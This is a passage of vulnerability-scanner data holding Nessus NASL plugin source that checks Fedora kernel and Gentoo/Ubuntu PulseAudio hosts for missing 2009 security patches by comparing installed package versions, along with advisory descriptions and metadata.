CVE-2009-2407 Adds\n-fno-delete- null-pointer-checks gcc compile flag to protect against\nissues similar to CVE-2009-1897.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # http://www.kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.27.26\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?221cc2c4\"\n );\n # http://www.kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.27.27\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?97580674\"\n );\n # http://www.kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.27.28\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?5b5c637f\"\n );\n # http://www.kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.27.29\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?38d2b377\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=511171\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=512861\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=512885\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2009-August/027436.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?ee2323e4\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kernel package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:ND\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(16, 119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:10\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/08/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/08/05\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^10([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 10.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC10\", reference:\"kernel-2.6.27.29-170.2.78.fc10\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:25:33", "description": "Fix security bugs: CVE-2009-1895 CVE-2009-2406 CVE-2009-2407 Add -fno- delete-null-pointer-checks gcc compile flag to protect against issues similar to CVE-2009-1897. Fix virtio_blk driver bug (reported against Fedora 10.) iwl3945 wireless driver rfkill fixes. Fix DPMS on some nVidia adapters when using the nouveau driver.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2009-08-05T00:00:00", "type": "nessus", "title": "Fedora 11 : kernel-2.6.29.6-217.2.3.fc11 (2009-8144)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-1895", "CVE-2009-1897", "CVE-2009-2406", "CVE-2009-2407"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:kernel", "cpe:/o:fedoraproject:fedora:11"], "id": "FEDORA_2009-8144.NASL", "href": "https://www.tenable.com/plugins/nessus/40481", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2009-8144.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(40481);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2009-1895\", \"CVE-2009-2406\", \"CVE-2009-2407\");\n script_bugtraq_id(35647, 35850, 35851);\n script_xref(name:\"FEDORA\", value:\"2009-8144\");\n\n script_name(english:\"Fedora 11 : kernel-2.6.29.6-217.2.3.fc11 (2009-8144)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Fix security bugs: CVE-2009-1895 CVE-2009-2406 CVE-2009-2407 Add -fno-\ndelete-null-pointer-checks gcc compile flag to protect against issues\nsimilar to CVE-2009-1897. Fix virtio_blk driver bug (reported against\nFedora 10.) iwl3945 wireless driver rfkill fixes. Fix DPMS on some\nnVidia adapters when using the nouveau driver.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=511171\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=512861\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=512885\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2009-August/027493.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?24db4f82\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kernel package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:ND\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(16, 119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/07/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/08/05\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^11([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 11.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC11\", reference:\"kernel-2.6.29.6-217.2.3.fc11\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:24:48", "description": "The remote host is affected by the vulnerability described in GLSA-200907-13 (PulseAudio: Local privilege escalation)\n\n Tavis Ormandy and Julien Tinnes of the Google Security Team discovered that the pulseaudio binary is installed setuid root, and does not drop privileges before re-executing itself. The vulnerability has independently been reported to oCERT by Yorick Koster.\n Impact :\n\n A local user who has write access to any directory on the file system containing /usr/bin can exploit this vulnerability using a race condition to execute arbitrary code with root privileges.\n Workaround :\n\n Ensure that the file system holding /usr/bin does not contain directories that are writable for unprivileged users.", "cvss3": {}, "published": "2009-07-17T00:00:00", "type": "nessus", "title": "GLSA-200907-13 : PulseAudio: Local privilege escalation", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-1894"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:gentoo:linux:pulseaudio", "cpe:/o:gentoo:linux"], "id": "GENTOO_GLSA-200907-13.NASL", "href": "https://www.tenable.com/plugins/nessus/39848", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 200907-13.\n#\n# The advisory text is Copyright (C) 2001-2016 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(39848);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2009-1894\");\n script_xref(name:\"GLSA\", value:\"200907-13\");\n\n script_name(english:\"GLSA-200907-13 : PulseAudio: Local privilege escalation\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-200907-13\n(PulseAudio: Local privilege escalation)\n\n Tavis Ormandy and Julien Tinnes of the Google Security Team discovered\n that the pulseaudio binary is installed setuid root, and does not drop\n privileges before re-executing itself. The vulnerability has\n independently been reported to oCERT by Yorick Koster.\n \nImpact :\n\n A local user who has write access to any directory on the file system\n containing /usr/bin can exploit this vulnerability using a race\n condition to execute arbitrary code with root privileges.\n \nWorkaround :\n\n Ensure that the file system holding /usr/bin does not contain\n directories that are writable for unprivileged users.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/200907-13\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All PulseAudio users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=media-sound/pulseaudio-0.9.9-r54'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_cwe_id(362);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:pulseaudio\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/07/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/07/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"media-sound/pulseaudio\", unaffected:make_list(\"ge 0.9.9-r54\"), vulnerable:make_list(\"lt 0.9.9-r54\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"PulseAudio\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:24:21", "description": "Tavis Ormandy, Julien Tinnes, and Yorick Koster discovered that PulseAudio did not safely re-execute itself. A local attacker could exploit this to gain root privileges.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2009-07-17T00:00:00", "type": "nessus", "title": "Ubuntu 8.04 LTS / 8.10 / 9.04 : pulseaudio vulnerability (USN-804-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-1894"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:libpulse-browse0", "p-cpe:/a:canonical:ubuntu_linux:libpulse-browse0-dbg", "p-cpe:/a:canonical:ubuntu_linux:libpulse-dev", "p-cpe:/a:canonical:ubuntu_linux:libpulse-mainloop-glib0", "p-cpe:/a:canonical:ubuntu_linux:libpulse-mainloop-glib0-dbg", "p-cpe:/a:canonical:ubuntu_linux:libpulse0", "p-cpe:/a:canonical:ubuntu_linux:libpulse0-dbg", "p-cpe:/a:canonical:ubuntu_linux:libpulsecore5", "p-cpe:/a:canonical:ubuntu_linux:libpulsecore5-dbg", "p-cpe:/a:canonical:ubuntu_linux:libpulsecore9", "p-cpe:/a:canonical:ubuntu_linux:libpulsecore9-dbg", "p-cpe:/a:canonical:ubuntu_linux:pulseaudio", "p-cpe:/a:canonical:ubuntu_linux:pulseaudio-dbg", "p-cpe:/a:canonical:ubuntu_linux:pulseaudio-esound-compat", "p-cpe:/a:canonical:ubuntu_linux:pulseaudio-esound-compat-dbg", "p-cpe:/a:canonical:ubuntu_linux:pulseaudio-module-gconf", "p-cpe:/a:canonical:ubuntu_linux:pulseaudio-module-gconf-dbg", "p-cpe:/a:canonical:ubuntu_linux:pulseaudio-module-hal", "p-cpe:/a:canonical:ubuntu_linux:pulseaudio-module-hal-dbg", "p-cpe:/a:canonical:ubuntu_linux:pulseaudio-module-lirc", "p-cpe:/a:canonical:ubuntu_linux:pulseaudio-module-lirc-dbg", "p-cpe:/a:canonical:ubuntu_linux:pulseaudio-module-x11", "p-cpe:/a:canonical:ubuntu_linux:pulseaudio-module-x11-dbg", "p-cpe:/a:canonical:ubuntu_linux:pulseaudio-module-zeroconf", "p-cpe:/a:canonical:ubuntu_linux:pulseaudio-module-zeroconf-dbg", "p-cpe:/a:canonical:ubuntu_linux:pulseaudio-utils", "p-cpe:/a:canonical:ubuntu_linux:pulseaudio-utils-dbg", "cpe:/o:canonical:ubuntu_linux:8.04:-:lts", "cpe:/o:canonical:ubuntu_linux:8.10", "cpe:/o:canonical:ubuntu_linux:9.04"], "id": "UBUNTU_USN-804-1.NASL", "href": "https://www.tenable.com/plugins/nessus/39851", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-804-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(39851);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2009-1894\");\n script_xref(name:\"USN\", value:\"804-1\");\n\n script_name(english:\"Ubuntu 8.04 LTS / 8.10 / 9.04 : pulseaudio vulnerability (USN-804-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Tavis Ormandy, Julien Tinnes, and Yorick Koster discovered that\nPulseAudio did not safely re-execute itself. A local attacker could\nexploit this to gain root privileges.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/804-1/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_cwe_id(362);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libpulse-browse0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libpulse-browse0-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libpulse-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libpulse-mainloop-glib0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libpulse-mainloop-glib0-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libpulse0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libpulse0-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libpulsecore5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libpulsecore5-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libpulsecore9\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libpulsecore9-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:pulseaudio\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:pulseaudio-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:pulseaudio-esound-compat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:pulseaudio-esound-compat-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:pulseaudio-module-gconf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:pulseaudio-module-gconf-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:pulseaudio-module-hal\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:pulseaudio-module-hal-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:pulseaudio-module-lirc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:pulseaudio-module-lirc-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:pulseaudio-module-x11\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:pulseaudio-module-x11-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:pulseaudio-module-zeroconf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:pulseaudio-module-zeroconf-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:pulseaudio-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:pulseaudio-utils-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:8.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:8.10\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:9.04\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/07/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/07/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2009-2019 Canonical, Inc. / NASL script (C) 2009-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! ereg(pattern:\"^(8\\.04|8\\.10|9\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 8.04 / 8.10 / 9.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"8.04\", pkgname:\"libpulse-browse0\", pkgver:\"0.9.10-1ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"libpulse-browse0-dbg\", pkgver:\"0.9.10-1ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"libpulse-dev\", pkgver:\"0.9.10-1ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"libpulse-mainloop-glib0\", pkgver:\"0.9.10-1ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"libpulse-mainloop-glib0-dbg\", pkgver:\"0.9.10-1ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"libpulse0\", pkgver:\"0.9.10-1ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"libpulse0-dbg\", pkgver:\"0.9.10-1ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"libpulsecore5\", pkgver:\"0.9.10-1ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"libpulsecore5-dbg\", pkgver:\"0.9.10-1ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"pulseaudio\", pkgver:\"0.9.10-1ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"pulseaudio-dbg\", pkgver:\"0.9.10-1ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"pulseaudio-esound-compat\", pkgver:\"0.9.10-1ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"pulseaudio-esound-compat-dbg\", pkgver:\"0.9.10-1ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"pulseaudio-module-gconf\", pkgver:\"0.9.10-1ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"pulseaudio-module-gconf-dbg\", pkgver:\"0.9.10-1ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"pulseaudio-module-hal\", pkgver:\"0.9.10-1ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"pulseaudio-module-hal-dbg\", pkgver:\"0.9.10-1ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"pulseaudio-module-lirc\", pkgver:\"0.9.10-1ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"pulseaudio-module-lirc-dbg\", pkgver:\"0.9.10-1ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"pulseaudio-module-x11\", pkgver:\"0.9.10-1ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"pulseaudio-module-x11-dbg\", pkgver:\"0.9.10-1ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"pulseaudio-module-zeroconf\", pkgver:\"0.9.10-1ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"pulseaudio-module-zeroconf-dbg\", pkgver:\"0.9.10-1ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"pulseaudio-utils\", pkgver:\"0.9.10-1ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"pulseaudio-utils-dbg\", pkgver:\"0.9.10-1ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"libpulse-browse0\", pkgver:\"0.9.10-2ubuntu9.4\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"libpulse-browse0-dbg\", pkgver:\"0.9.10-2ubuntu9.4\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"libpulse-dev\", pkgver:\"0.9.10-2ubuntu9.4\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"libpulse-mainloop-glib0\", pkgver:\"0.9.10-2ubuntu9.4\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"libpulse-mainloop-glib0-dbg\", pkgver:\"0.9.10-2ubuntu9.4\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"libpulse0\", pkgver:\"0.9.10-2ubuntu9.4\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"libpulse0-dbg\", 